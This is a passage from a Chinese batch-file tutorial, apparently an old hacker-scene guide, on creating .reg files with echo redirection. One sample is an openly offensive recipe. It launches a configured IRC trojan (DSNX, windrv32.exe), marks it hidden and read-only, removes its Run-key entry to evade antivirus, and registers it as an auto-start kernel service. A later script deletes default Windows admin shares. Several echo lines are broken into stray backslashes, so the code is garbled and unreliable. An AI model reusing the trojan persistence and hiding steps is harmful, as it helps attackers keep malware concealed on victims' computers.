执行该脚本,
[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]就已经被删除了。相信看到这里,.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了,记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。samlpe1:如上面的那个例子,如想生成如下注册表文件
Windows Registry Editor Version
5.00[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run] \\
\只需要这样:
@echo Windows Registry Editor Version 5.00>>Sample.reg@echo
[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]>Sample.reg
@echo \
@echo \@echo \samlpe2:
我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run(Runon
ce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为windrv32.exe) @start windrv32.exe @attrib +h +r windrv32.exe @echo
[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run] >>patch.dll
@echo \
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\\winnt\\system32\\windrv32.exe @regedit /s patch.dll @delete patch.dll@REM
[删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读,并config为自启动] @REM 这样不是更安全^_^.六.精彩实例放送。 1.删除win2k/xp系统默认共享的批处理
------------------------ cut here then save as .bat or .cmd file ---------------------------@echo preparing to delete all the default shares.when ready pres any key. @pause @echo off
:Rem check parameters if null show usage. if {%1}=={} goto :Usage :Rem code start. echo.
echo ------------------------------------------------------ echo.
echo Now deleting all the default shares. echo.
net share %1$ /delete net share %2$ /delete net share %3$ /delete net share %4$ /delete net share %5$ /delete net share %6$ /delete net share %7$ /delete net share %8$ /delete net share %9$ /delete net stop Server net start Server echo.
echo All the shares have been deleteed echo.
echo ------------------------------------------------------ echo.
echo Now modify the registry to change the system default properties. echo.
echo Now creating the registry file
echo Windows Registry Editor Version 5.00> c:\\delshare.reg echo
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\lanmanserver\\parameters]>> c:\\delshare.reg
echo \echo \echo Nowing using the registry file to chang the system default properties.
regedit /s c:\\delshare.reg
echo Deleting the temprotarily files. del c:\\delshare.reg goto :END :Usage echo.
echo ------------------------------------------------------
echo.
echo ☆ A example for batch file ☆
echo ☆ [Use batch file to change the sysytem share properties.] ☆ echo.
echo Author:Ex4rch
echo Mail:Ex4rch@hotmail.com QQ:1672602 echo.
echo Error:Not enough parameters echo.
echo ☆ Please enter the share disk you wanna delete ☆ echo.
echo For instance,to delete the default shares: echo delshare c d e ipc admin print echo.
echo If the disklable is not as C: D: E: ,Please chang it youself. echo.
echo example:
echo If locak disklable are C: D: E: X: Y: Z: ,you should chang the command into :
echo delshare c d e x y z ipc admin print echo.
echo *** you can delete nine shares once in a useing ***